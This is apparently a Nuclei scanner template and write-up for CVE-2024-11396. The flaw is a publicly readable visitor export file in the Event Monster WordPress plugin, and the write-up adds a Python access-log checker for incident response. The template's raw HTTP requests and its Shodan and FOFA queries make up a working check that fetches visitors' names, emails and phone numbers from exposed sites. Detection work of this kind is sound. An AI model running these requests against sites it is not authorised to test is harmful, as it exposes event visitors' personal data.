Event Monster <= 1.4.3 - Information Exposure Via Visitors List Export

ID: CVE-2024-11396

Severity: medium

Author: s4e-io

Tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak

The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, including first and last names, email, and phone number.

id: CVE-2024-11396
info:
  name: Event Monster <= 1.4.3 - Information Exposure Via Visitors List Export
  author: s4e-io
  severity: medium
  description: |
    The Event Monster Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-11396
    - https://plugins.trac.wordpress.org/browser/event-monster/tags/1.4.3/em-ajax-prossesing/em-visitor-ajax.php#L92
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11396
    - https://github.com/advisories/GHSA-6x4w-fvqp-6jvc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-11396
    cwe-id: CWE-359
    epss-score: 0.00046
    epss-percentile: 0.19303
  metadata:
    verified: true
    max-request: 2
    vendor: a-wp-life
    product: event-monster
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/event-monster"
    fofa-query: body="wp-content/plugins/event-monster"
  tags: cve,cve2024,wordpress,wp,wp-plugin,event-monster,info-leak
flow: http(1) && http(2)
http:
  - raw:
      - |
        GET /wp-content/plugins/event-monster/readme.txt HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 1.4.3")'
          - 'contains(body, "event-monster")'
          - 'status_code == 200'
        condition: and
        internal: true
    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        internal: true
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"
  - raw:
      - |
        GET /wp-content/uploads/visitors-list.csv HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "First Name, Last Name, Email, Phone, Event")'
          - 'contains(content_type, "text/csv")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220103d2ae4965c41496c11da75c3c1a3adf5c457a99371ed616bc90c6f642c761f02205037c1b015321ac5cf4a297240cf3cc237b3b2ea0c783f3925275becd4a37996:922c64590222798bb761d5b6d8e72950

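This template detects CVE-2024-11396 in two steps. It first reads the plugin's readme.txt and confirms that the "Stable tag" version is 1.4.3 or lower, then requests /wp-content/uploads/visitors-list.csv and matches on the CSV header row, a text/csv content type, and a 200 status. Run it with the Nuclei tool:
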
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-11396.yaml"
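
For a site that ran an affected version, the hardcoded path the template requests can also be searched for in the web server's access logs to see whether the export was already served to anyone. The following is an added example, not part of the template or the plugin; it assumes Combined Log Format, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Path requested by the template's second HTTP step.
EXPORT_PATH = "/wp-content/uploads/visitors-list.csv"

# Assumed Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_export_downloads(lines):
    """Return one dict per request that was served the visitor export."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        # Normalise the target: drop the query string, decode %xx, collapse "//".
        path = m["target"].split("?", 1)[0]
        path = re.sub(r"/{2,}", "/", unquote(path))
        # Compare case-insensitively; the status check below drops spellings the server rejected.
        if path.lower() != EXPORT_PATH:
            continue
        # 200/206 mean the file body (or part of it) was sent to the client.
        if m["status"] in ("200", "206"):
            size = int(m["size"]) if m["size"].isdigit() else 0
            hits.append({"ip": m["ip"], "time": m["time"],
                         "method": m["method"], "bytes": size})
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2024:10:15:32 +0000] "GET /wp-content/uploads/visitors-list.csv HTTP/1.1" 200 48213 "-" "curl/8.5.0"',
    '198.51.100.23 - - [12/Dec/2024:10:16:01 +0000] "GET /wp-content/uploads/visitors-list.csv HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Dec/2024:11:02:47 +0000] "GET /wp-content//uploads/visitors-list%2Ecsv?cb=1 HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Dec/2024:11:05:00 +0000] "GET /wp-content/plugins/event-monster/readme.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_export_downloads(SAMPLE_LOG):
        print(hit)
```

Any hit from an address that is not a site administrator indicates the visitor data should be treated as disclosed.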